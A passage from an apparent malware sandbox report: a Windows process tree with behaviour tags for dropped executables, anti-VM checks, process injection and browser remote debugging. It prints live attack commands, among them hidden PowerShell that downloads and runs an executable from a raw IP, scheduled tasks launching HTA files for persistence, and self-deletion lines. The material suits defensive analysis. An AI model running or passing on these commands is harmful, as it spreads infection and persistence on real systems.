C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:814⤵PID:13268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:814⤵PID:13360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:814⤵PID:13620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:814⤵PID:13624
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AKKFHDAKEC.exe"12⤵
- System Location Discovery: System Language Discovery
PID:8932 -
C:\Users\Admin\AKKFHDAKEC.exe"C:\Users\Admin\AKKFHDAKEC.exe"13⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:15084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:14952 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"15⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:9168 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffa3686dcf8,0x7ffa3686dd04,0x7ffa3686dd1016⤵PID:13240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=2432 /prefetch:316⤵PID:12344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2384,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=2380 /prefetch:216⤵PID:14188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2080,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:816⤵PID:14212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:116⤵
- Uses browser remote debugging
PID:3948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=3300 /prefetch:116⤵
- Uses browser remote debugging
PID:12452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=4468 /prefetch:116⤵
- Uses browser remote debugging
PID:13328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5080,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:816⤵PID:12520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,5417214644173452408,10132409442562842248,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:816⤵PID:13656
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"15⤵
- Uses browser remote debugging
PID:11736 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch16⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5056 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ffa1ad1f208,0x7ffa1ad1f214,0x7ffa1ad1f22017⤵PID:8992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2188,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:217⤵PID:9264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2220,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:317⤵PID:9076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:817⤵PID:11120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3460,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:117⤵
- Uses browser remote debugging
PID:9268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:117⤵
- Uses browser remote debugging
PID:8656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3196,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:817⤵PID:24980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4640,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:817⤵PID:24988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,9257797543014990082,3509792925100420909,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:817⤵PID:25056
-
-
-
-
C:\ProgramData\ph47qiwbs0.exe"C:\ProgramData\ph47qiwbs0.exe"15⤵
- Suspicious use of SetThreadContext
PID:22020 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"16⤵
- System Location Discovery: System Language Discovery
PID:22088
-
-
-
C:\ProgramData\glx4o8qq1d.exe"C:\ProgramData\glx4o8qq1d.exe"15⤵PID:22220
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"16⤵PID:22280
-
-
-
C:\ProgramData\9r1ngvkngv.exe"C:\ProgramData\9r1ngvkngv.exe"15⤵
- System Location Discovery: System Language Discovery
PID:22436 -
C:\Users\Admin\AppData\Local\Temp\WJJzsb2o\LtsbBmOMKouFwcgn.exeC:\Users\Admin\AppData\Local\Temp\WJJzsb2o\LtsbBmOMKouFwcgn.exe 016⤵
- System Location Discovery: System Language Discovery
PID:21748 -
C:\Users\Admin\AppData\Local\Temp\WJJzsb2o\QNSQC73nbH72joAr.exeC:\Users\Admin\AppData\Local\Temp\WJJzsb2o\QNSQC73nbH72joAr.exe 2174817⤵
- System Location Discovery: System Language Discovery
PID:22492
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\8g4wl" & exit15⤵
- System Location Discovery: System Language Discovery
PID:22692 -
C:\Windows\SysWOW64\timeout.exetimeout /t 1116⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:23852
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\BKKKEGIDBG.exe"12⤵PID:5016
-
C:\Users\Admin\BKKKEGIDBG.exe"C:\Users\Admin\BKKKEGIDBG.exe"13⤵
- Executes dropped EXE
PID:15172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵PID:15116
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IIJDBAKKKF.exe"12⤵PID:14924
-
C:\Users\Admin\IIJDBAKKKF.exe"C:\Users\Admin\IIJDBAKKKF.exe"13⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:14872 -
C:\Users\Admin\AppData\Local\Temp\Zmm0hJlU\qRKxyjRGQ0DR2WdQ.exeC:\Users\Admin\AppData\Local\Temp\Zmm0hJlU\qRKxyjRGQ0DR2WdQ.exe 014⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:14848 -
C:\Users\Admin\AppData\Local\Temp\Zmm0hJlU\7Bfx0AYRCqL2I5Yz.exeC:\Users\Admin\AppData\Local\Temp\Zmm0hJlU\7Bfx0AYRCqL2I5Yz.exe 1484815⤵
- System Location Discovery: System Language Discovery
PID:14816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14816 -s 77216⤵
- Program crash
PID:24920
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14848 -s 72415⤵
- Program crash
PID:24912
-
-
-
-
-
-
-
C:\ProgramData\jmyu379zc2.exe"C:\ProgramData\jmyu379zc2.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\1BHmf4kc\7Bd1zjNeuyRVLqDa.exeC:\Users\Admin\AppData\Local\Temp\1BHmf4kc\7Bd1zjNeuyRVLqDa.exe 011⤵
- Downloads MZ/PE file
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6008 -
C:\Users\Admin\AppData\Local\Temp\1BHmf4kc\9sRLB1swy6WmobzJ.exeC:\Users\Admin\AppData\Local\Temp\1BHmf4kc\9sRLB1swy6WmobzJ.exe 600812⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4264 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 107613⤵
- Program crash
PID:11184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FGeVl4nz\B6DYtDbU8K65ltjj.exeC:\Users\Admin\AppData\Local\Temp\FGeVl4nz\B6DYtDbU8K65ltjj.exe 012⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10216 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"13⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
-
C:\Users\Admin\AppData\Local\Temp\1BHmf4kc\q5Vn4MDNtttD4KVL.exeC:\Users\Admin\AppData\Local\Temp\1BHmf4kc\q5Vn4MDNtttD4KVL.exe 600812⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 66013⤵
- Program crash
PID:11664
-
-
-
C:\Users\Admin\AppData\Local\Temp\1BHmf4kc\8IohuLofB41F0Yfi.exeC:\Users\Admin\AppData\Local\Temp\1BHmf4kc\8IohuLofB41F0Yfi.exe 600812⤵
- Executes dropped EXE
PID:12704
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\1vaa1" & exit10⤵
- System Location Discovery: System Language Discovery
PID:10136 -
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:10184
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2220 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5744 -
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6044
-
-
-
C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030290101\4431ad04dd.exe"C:\Users\Admin\AppData\Local\Temp\10030290101\4431ad04dd.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5744 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"9⤵
- Downloads MZ/PE file
PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030300101\947905fad3.exe"C:\Users\Admin\AppData\Local\Temp\10030300101\947905fad3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:928 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"9⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:10072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit7⤵
- System Location Discovery: System Language Discovery
PID:3360 -
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235690101\87a483eddc.exe"C:\Users\Admin\AppData\Local\Temp\10235690101\87a483eddc.exe"6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 5b8F4maGFiu /tr "mshta C:\Users\Admin\AppData\Local\Temp\ipQjyD0Vq.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 5b8F4maGFiu /tr "mshta C:\Users\Admin\AppData\Local\Temp\ipQjyD0Vq.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:4408
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ipQjyD0Vq.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484 -
C:\Users\Admin\AppData\Local\TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE"C:\Users\Admin\AppData\Local\TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4208
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10235700121\am_no.cmd" "6⤵
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "8JV5emaw3pJ" /tr "mshta \"C:\Temp\0eEPTSdNI.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2892
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\0eEPTSdNI.hta"7⤵
- Checks computer location settings
PID:4452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1596
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235900101\c59f8b1bd4.exe"C:\Users\Admin\AppData\Local\Temp\10235900101\c59f8b1bd4.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3156 -
C:\Users\Admin\AppData\Local\Temp\10235900101\c59f8b1bd4.exe"C:\Users\Admin\AppData\Local\Temp\10235900101\c59f8b1bd4.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235910101\18b1abad16.exe"C:\Users\Admin\AppData\Local\Temp\10235910101\18b1abad16.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\10235920101\a1096309f8.exe"C:\Users\Admin\AppData\Local\Temp\10235920101\a1096309f8.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5452
-
-
C:\Users\Admin\AppData\Local\Temp\10235930101\5a4a70c0e3.exe"C:\Users\Admin\AppData\Local\Temp\10235930101\5a4a70c0e3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
